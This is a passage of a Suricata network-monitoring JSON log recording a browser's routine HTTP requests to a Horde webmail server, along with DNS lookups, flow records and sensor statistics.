(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.305271+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} {"timestamp":"2020-02-29T00:24:57.305309+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} {"timestamp":"2020-02-29T00:24:57.393839+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":9}} {"timestamp":"2020-02-29T00:24:57.394706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:24:57.394760+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.395059+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:24:58.000531+0000","flow_id":943259344790734,"event_type":"flow","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:57.419022+0000","end":"2020-02-29T00:19:57.527637+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:59.000368+0000","flow_id":599515932326705,"event_type":"flow","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:58.719665+0000","end":"2020-02-29T00:19:58.830845+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:59.000883+0000","flow_id":1124622944265220,"event_type":"flow","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":9129,"start":"2020-02-29T00:23:53.222212+0000","end":"2020-02-29T00:23:58.492690+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:59.853152+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":10}} 
{"timestamp":"2020-02-29T00:24:59.853519+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:24:59.968706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":11}} {"timestamp":"2020-02-29T00:24:59.969044+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} 
{"timestamp":"2020-02-29T00:25:00.152171+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":12}} {"timestamp":"2020-02-29T00:25:00.152424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} {"timestamp":"2020-02-29T00:25:02.195588+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53130,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:25:02.202811+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":2}} {"timestamp":"2020-02-29T00:25:02.203011+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":3}} 
{"timestamp":"2020-02-29T00:25:02.206799+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":3}} {"timestamp":"2020-02-29T00:25:02.308566+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59724,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:02.338773+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":13}} 
{"timestamp":"2020-02-29T00:25:02.400006+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":6}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:02.472424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} 
{"timestamp":"2020-02-29T00:25:02.559671+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":14}} {"timestamp":"2020-02-29T00:25:02.561541+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:25:02.568769+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":15}} 
{"timestamp":"2020-02-29T00:25:02.609536+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:25:03.000163+0000","event_type":"stats","stats":{"uptime":15155,"capture":{"kernel_packets":140642,"kernel_drops":0},"decoder":{"pkts":140790,"bytes":96640184,"invalid":195,"ipv4":139205,"ipv6":10,"ethernet":140790,"raw":0,"null":0,"sll":0,"tcp":133643,"udp":5352,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088704},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2447,"failed_udp":116},"tx":{"http":4955,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2531}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2
530,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} {"timestamp":"2020-02-29T00:25:05.000558+0000","flow_id":811820461074107,"event_type":"flow","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:04.468667+0000","end":"2020-02-29T00:20:04.579983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:06.898313+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36277,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39043,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:06.930810+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":16}} 
{"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:07.094400+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356}} {"timestamp":"2020-02-29T00:25:07.160564+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":17}} 
{"timestamp":"2020-02-29T00:25:07.164197+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:25:07.179831+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":18}} {"timestamp":"2020-02-29T00:25:07.221307+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":19,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} 
{"timestamp":"2020-02-29T00:25:10.000204+0000","event_type":"stats","stats":{"uptime":15162,"capture":{"kernel_packets":140833,"kernel_drops":0},"decoder":{"pkts":140850,"bytes":96657728,"invalid":195,"ipv4":139263,"ipv6":10,"ethernet":140850,"raw":0,"null":0,"sll":0,"tcp":133697,"udp":5356,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":353,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1218,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2449,"failed_udp":116},"tx":{"http":4961,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2533}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2531,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} 
{"timestamp":"2020-02-29T00:25:12.185232+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":19}} {"timestamp":"2020-02-29T00:25:12.486392+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59784,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 